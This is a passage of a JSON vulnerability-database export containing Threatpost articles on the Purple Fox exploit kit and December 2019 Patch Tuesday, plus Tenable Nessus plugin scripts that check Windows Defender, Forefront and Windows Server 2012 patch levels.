advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "modified": "2020-04-24T20:44:05", "published": "2020-04-24T20:44:05", "id": "THREATPOST:230DF95E70EB9C4F372C198798822D19", "href": "https://threatpost.com/sashome-virtual-summit-showcases-threat-intel/155128/", "type": "threatpost", "title": "SAS@Home Virtual Summit Showcases New Threat Intel, Industry Changes", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:23:02", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701", "CVE-2018-8120", "CVE-2019-1458", "CVE-2020-0674"], "description": "The Purple Fox exploit kit (EK) has added two new exploits targeting critical- and high-severity Microsoft vulnerabilities to its bag of tricks \u2013 and researchers say they expect more attacks to be added in the future.\n\nThe Purple Fox EK was [previously analyzed](<https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/>) in September, when researchers said that it appears to have been built to [replace the Rig EK](<https://threatpost.com/inside-the-rig-exploit-kit/121805/>) in the distribution chain of Purple Fox malware, which is a trojan/rootkit. The latest revision to the exploit kit has added attacks against flaws tracked as [CVE-2020-0674](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0674>) and [CVE-2019-1458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1458>), which were first disclosed at the end of 2019 and early 2020. Purple Fox previously [used exploits](<https://securityintelligence.com/news/purple-fox-malware-spread-by-rig-exploit-kit-capable-of-abusing-powershell/>) targeting older Microsoft flaws, including ones tracked as [CVE-2018-8120](<https://nvd.nist.gov/vuln/detail/CVE-2018-8120>) and [CVE-2015-1701](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1701>).\n\n\u201cThis tells us that the authors of Purple Fox are staying up to date on viable exploitable vulnerabilities and updating when they become available,\u201d said researchers with Proofpoint in a [Monday analysis](<https://www.proofpoint.com/us/blog/threat-insight/purple-fox-ek-adds-exploits-cve-2020-0674-and-cve-2019-1458-its-arsenal>). \u201cIt\u2019s reasonable to expect that they will continue to update as new vulnerabilities are discovered.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nCVE-2020-0674 is a [critical scripting engine memory corruption](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>) vulnerability in Internet Explorer, which was [disclosed](<https://twitter.com/msftsecresponse/status/1218296055579602944>) by Microsoft in a January 2020 out-of-band security advisory. The flaw could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user \u2013 meaning that an adversary could [gain the same user rights](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) as the current user. The flaw was later [fixed ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>)as part of the February 2020 Patch Tuesday release. Since then, further analysis of the flaw has been [published](<https://labs.f-secure.com/blog/internet-exploiter-understanding-vulnerabilities-in-internet-explorer>) and proof-of-concept (PoC) code has been [released](<https://github.com/maxpl0it/CVE-2020-0674-Exploit>), said researchers.\n\nCVE-2019-1458 meanwhile is a high-severity [elevation-of-privilege vulnerability](<https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/>) in Win32k, which has a zero-day exploit circulating in the wild (used in attacks including [Operation WizardOpium)](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>). The exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said. The flaw, which has a CVSS score of 7.8 out of 10, was [fixed ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>)by Microsoft as part of its December Patch Tuesday release.\n\n## **Purple Fox**\n\nResearchers discovered a malvertising campaign in late June that utilized the Purple Fox EK, successfully exploiting Internet Explorer 11 via CVE-2020-0674 on Windows 10. The exploit used for CVE-2020-0674 targets Internet Explorer\u2019s usage of jscript.dll, a library required for Windows to operate. At the start of the exploit process, the malicious script attempts to leak an address from the RegExp implementation within jscript.dll.\n\nWith that leaked address, the malicious JavaScript code then searches for the PE header of jscript.dll, and then uses that header to locate an import descriptor for kernel32.dll. That contains the process and memory manipulation functions required for the EK to load the actual shellcode.\n\n\u201cIn particular, the function GetModuleHandleA is used to obtain the running module handle,\u201d said researchers. \u201cThis handle is used along with GetProcAddress to locate VirtualProtect, which is in turn used to enable \u2018read, write, execute\u2019 (RWX) permissions on the shellcode. Finally, the shellcode is triggered by calling an overwritten implementation of RegExp::test.\u201d\n\nThe shellcode then locates WinExec to create a new process, which begins the actual execution of the malware.\n\n## **EK Future**\n\nWhile exploit kits are [not as popular as they were](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) a few years ago, researchers stress that they are [still part of the](<https://threatpost.com/threatlist-exploit-kits-still-a-top-web-based-threat/133044/>) threat landscape, with EKs like [Fallout and Rig continually retooling](<https://threatpost.com/fallout-ek-retools/141027/>).\n\n\u201cOne thing that hasn\u2019t changed regarding exploit kits is the way in which exploit-kit authors regularly update to include new attacks against newly discovered vulnerabilities,\u201d researchers said.\n\nBy building their own EK for distribution, the authors of the Purple Fox malware have been able to save money by no longer paying for the Rig EK. This shows that the attackers behind the Purple Fox malware are taking a \u201cprofessional approach\u201d by looking to save money and keep their product current, researchers said.\n\n\u201cThe fact that the authors of the Purple Fox malware have stopped using the RIG EK and moved to build their own EK to distribute their malware reminds us that malware is a business,\u201d they said. \u201cIn essence, the authors behind the Purple Fox malware decided to bring development \u2018in-house\u2019 to reduce costs, just like many legitimate businesses do. Bringing the distribution mechanism \u2018in-house\u2019 also enables greater control over what the EK actually loads.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "modified": "2020-07-06T15:21:30", "published": "2020-07-06T15:21:30", "id": "THREATPOST:F0CFD85C624CF71A4056F7DCC02BD683", "href": "https://threatpost.com/microsoft-exploits-purple-fox-ek/157157/", "type": "threatpost", "title": "Purple Fox EK Adds Microsoft Exploits to Arsenal", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T22:40:13", "bulletinFamily": "info", "cvelist": ["CVE-2019-0859", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1352", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1471"], "description": "Microsoft has issued fixes for 36 CVEs for December 2019 Patch Tuesday across a range of products, with seven of them rated critical in severity \u2013 and one that\u2019s already being exploited in the wild as a zero-day bug.\n\nThe computing giant\u2019s [scheduled security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2019-Dec>) this month is relatively light, and includes patches for Microsoft Windows, Internet Explorer, Microsoft Office and related apps, SQL Server, Visual Studio and Skype for Business. In all, December Patch Tuesday addressed seven bugs that are rated critical, 28 that are rated important, and one that rated moderate in severity.\n\n## Zero-Day Bug Exploited in the Wild\n\n[CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458?ranMID=43674&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&epi=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&irgwc=1&OCID=AID2000142_aff_7795_1243925&tduid=\\(ir__6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00\\)\\(7795\\)\\(1243925\\)\\(je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w\\)\\(\\)&irclickid=_6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00>) is an elevation-of-privilege vulnerability in Win32k, which has a live zero-day exploit circulating in the wild. The exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said.\n\n\u201cAn attacker could exploit the flaw to execute arbitrary code in kernel mode on the victim\u2019s system,\u201d said Satnam Narang, senior research engineer at Tenable, via email. \u201cFrom there, the attacker could perform a variety of actions, such as creating a new account with full user rights, installing programs, and viewing, changing or deleting data.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7725318633369800449?source=INART>)\n\nThe one caveat is that to exploit the flaw, an attacker would need to have previously compromised the system using another vulnerability \u2013 thus, it\u2019s rated only as important in severity and carries a CVSSv3 base score of 7.8 out of 10. However, since it has been exploited in the wild as a zero-day, IT security staff should prioritize the patch, researchers said.\n\n\u201cThis is one of many vulnerabilities that Microsoft resolved in 2019 that were being exploited but were not rated as a critical severity,\u201d said Chris Goettl, director of product management, Security, at Ivanti, via email. \u201cIf your vulnerability-management criteria use vendor severity or CVSS score as criteria for determining what should be updated, you should re-evaluate your criteria to ensure exploited vulnerabilities like this do not slip past your prioritization process.\u201d\n\nThe zero-day was found by Kaspersky researchers as a result of a separate zero-day exploit for Google Chrome that was seen in November, being used to execute arbitrary code on a victim\u2019s machine. The newly discovered Windows EoP was embedded into a previously discovered Google Chrome exploit, the firm said: \u201cIt was used to gain higher privileges in the infected machine as well as to escape the Chrome process sandbox \u2013 a component built to protect the browser and the victim\u2019s computer from malicious attacks.\u201d\n\nThe exploits are being used by a threat group called \u201cWizardOpium.\u201d\n\nMicrosoft has addressed the vulnerability by correcting how Win32k handles objects in memory. The flaw is also similar to the CVE-2019-0859 bug reported in April, for which an exploit was developed and found being sold on [underground markets](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>).\n\n## Critical Bugs\n\nIn terms of the critical bugs included in this month\u2019s Patch Tuesday, a critical remote code-execution (RCE) vulnerability in Win32k Graphics ([CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468?ranMID=43674&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-mFIAATdHZaWiphGfgHHVaQ&epi=je6NUbpObpQ-mFIAATdHZaWiphGfgHHVaQ&irgwc=1&OCID=AID2000142_aff_7795_1243925&tduid=\\(ir__6kyw1a3v19kfrhwjkk0sohzn0n2xgdsnx6wdqz2h00\\)\\(7795\\)\\(1243925\\)\\(je6NUbpObpQ-mFIAATdHZaWiphGfgHHVaQ\\)\\(\\)&irclickid=_6kyw1a3v19kfrhwjkk0sohzn0n2xgdsnx6wdqz2h00>)) would allow an adversary to create a new account with full user rights, install programs, and view, change or delete data. It exists due to the Windows font library improperly handling specially crafted embedded fonts. Attack vectors would be via a malicious document, or by luring users to a specially crafted website containing the exploit code.\n\n\u201cTo exploit the vulnerability, an attacker would need to run a specially crafted application on the guest operating system, resulting in execution of arbitrary code on the host operating system,\u201d said Narang.\n\nAlso on the RCE front, critical-rated [CVE-2019-1471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1471>) in Windows Hyper-V exists due to improper validation of inputs from an authenticated user on the guest operating system by the host server.\n\n\u201cThis critical-rated patch fixes a bug in Hyper-V that would allow a user on a guest OS to execute arbitrary code on the underlying host OS,\u201d explained Dustin Childs, researcher with Trend Micro\u2019s Zero-Day Initiative. \u201cBugs like this have been demonstrated at Pwn2Own in the past, and they\u2019re always fun to watch. Considering how much modern computing depends on virtualization, it\u2019s likely we\u2019ll continue to see research that focuses on exploiting the hypervisor from a guest OS.\u201d\n\nMicrosoft also announced five critical vulnerabilities for Microsoft\u2019s Git for Visual Studio 2017 and 2019 (CVE-2019-1349, CVE-2019-1350, CVE-2019-1352, CVE-2019-1354, CVE-2019-1387).\n\nThe description for all of them [is identical:](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1349>) an RCE bug that exists when Git for Visual Studio client improperly sanitizes input (sanitization is the process of modifying input to ensure that it is actually valid).\n\n\u201cAs Visual Studio is one of the most popular development environments used today to design and build applications, this exploit puts engineering organizations on the front lines of a potential attack,\u201d explained Richard Melick, senior technology product manager at Automox, via email. \u201cIf left unpatched, engineering and development groups would be at risk to being the point of entry for malware deployment, lateral movement through the network, rogue account creation, and theft of proprietary application code.\u201d\n\nIn order to exploit any of these Visual Studio vulnerabilities, an attacker would need to use the Git client to download a malicious repository to the victim\u2019s endpoint.\n\n\u201cWhile not common, it is still possible using fairly simple techniques,\u201d Melick said. \u201cBy running intelligence gathering in channels like LinkedIn and job listings, an attacker could learn about an organization\u2019s use of Visual Studio and the details of the open-source projects in play. From there, entry into the network could come through a common phishing email technique to the engineering for help troubleshooting a compatibility issue with their open-source software, providing a link to the Git repository, or even for an interview as an example of previous work. The engineering team would then download the malicious repo, allowing the malicious code to execute, giving attacker access.\u201d\n\n## Additional Notes\n\nOne other bug that stood out to researchers in the update is [CVE-2019-1469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1469>), an important-rated Win32k information disclosure vulnerability that exists when a Win32k component improperly provides kernel information.\n\n\u201cA successful attack through this vulnerability could result in private data being revealed to an attacker, providing necessary information to further compromise the victim\u2019s system,\u201d Melick said. \u201cA successful attack relies on access to the machine to load a specially crafted application.\u201d\n\nAnd finally, it\u2019s also worth mentioning that there is only one Patch Tuesday left (in January) until Windows 7 and Server 2008\\2008 R2 reach end-of-life and Microsoft stops issuing security fixes for them.\n\n\u201cThere is no doubt we are going to see a similar situation to the Windows XP end-of-service with a large number of these machines still in use and not updated,\u201d Melick said. \u201cIt is safe to assume that many of these machines in this bucket are falling under unmanaged or mission-critical categories with no clear path to update.\u201d\n\nAlso on Patch Tuesday, [Adobe issued 17 critical vulnerabilities](<https://threatpost.com/adobe-fixes-critical-acrobat-photoshop-brackets-flaws/150970/>) in Acrobat Reader, Photoshop and Brackets, which could lead to arbitrary code execution if exploited.\n\n[**Free Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n", "modified": "2019-12-10T21:21:24", "published": "2019-12-10T21:21:24", "id": "THREATPOST:7E0D83AD71F0D13E7AF6CC3E38AC5F6F", "href": "https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/", "type": "threatpost", "title": "Microsoft Zaps Actively Exploited Zero-Day Bug", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T14:27:15", "description": "The Malware Protection Engine version of Forefront Endpoint Protection installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "Security Update for Forefront Endpoint Protection (January 2021)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1647"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/a:microsoft:system_center_endpoint_protection"], "id": "SMB_NT_MS21_JAN_FEP.NASL", "href": "https://www.tenable.com/plugins/nessus/144886", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144886);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2021-1647\");\n\n script_name(english:\"Security Update for Forefront Endpoint Protection (January 2021)\");\n script_summary(english:\"Checks the Malware Engine version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An antimalware application installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Malware Protection Engine version of Forefront Endpoint Protection installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?66e83fa0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Enable automatic updates to update the malware engine for the relevant antimalware applications. Refer to Knowledge Base\nArticle 2510781 for information on how to verify that MMPE has been updated.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1647\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:system_center_endpoint_protection\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"fep_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Forefront Endpoint Protection';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\n# Check if we got tyhe Malware Engine Version\nif (isnull(app_info['engine_version']))\n exit(0,'Unable to get the Malware Engine Version.');\n\nconstraints = [{'max_version': '1.1.17600.5', 'fixed_version':'1.1.17700.4'}];\n\nvcf::av_checks::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, check:'engine_version');\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:27:16", "description": "The Malware Protection Engine version of Microsoft Windows Defender installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "Security Update for Windows Defender (January 2021)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1647"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:windows_defender"], "id": "SMB_NT_MS21_JAN_WIN_DEFENDER.NASL", "href": "https://www.tenable.com/plugins/nessus/144876", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144876);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2021-1647\");\n\n script_name(english:\"Security Update for Windows Defender (January 2021)\");\n script_summary(english:\"Checks the Malware Engine version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An antimalware application installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Malware Protection Engine version of Microsoft Windows Defender installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?66e83fa0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Enable automatic updates to update the malware engine for the relevant antimalware applications. Refer to Knowledge Base\nArticle 2510781 for information on how to verify that MMPE has been updated.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1647\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_defender\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_windows_defender_win_installed.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/svcs\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Windows Defender';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\n# Check if disabled\nif (!isnull(app_info['Disabled']))\n exit(0,'Windows Defender is disabled.');\n\n# Check if we got tyhe Malware Engine Version\nif (isnull(app_info['Engine Version']))\n exit(0,'Unable to get the Malware Engine Version.');\n\nconstraints = [{'max_version': '1.1.17600.5', 'fixed_version':'1.1.17700.4'}];\n\nvcf::av_checks::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, check:'Engine Version');\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-02T14:45:44", "description": "The remote Windows host is missing security update 4598297\nor cumulative update 4598278. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17087, CVE-2021-1648, CVE-2021-1649, \n CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, \n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, \n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, \n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, \n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)", "edition": 7, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598297: Windows Server 2012 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2020-17087", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598278.NASL", "href": "https://www.tenable.com/plugins/nessus/144881", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144881);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/01\");\n\n script_cve_id(\n \"CVE-2020-17087\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598278\");\n script_xref(name:\"MSKB\", value:\"4598297\");\n script_xref(name:\"MSFT\", value:\"MS21-4598278\");\n script_xref(name:\"MSFT\", value:\"MS21-4598297\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598297: Windows Server 2012 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598297\nor cumulative update 4598278. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17087, CVE-2021-1648, CVE-2021-1649, \n CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, \n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, \n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, \n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, \n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\");\n # https://support.microsoft.com/en-us/help/4598278/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", 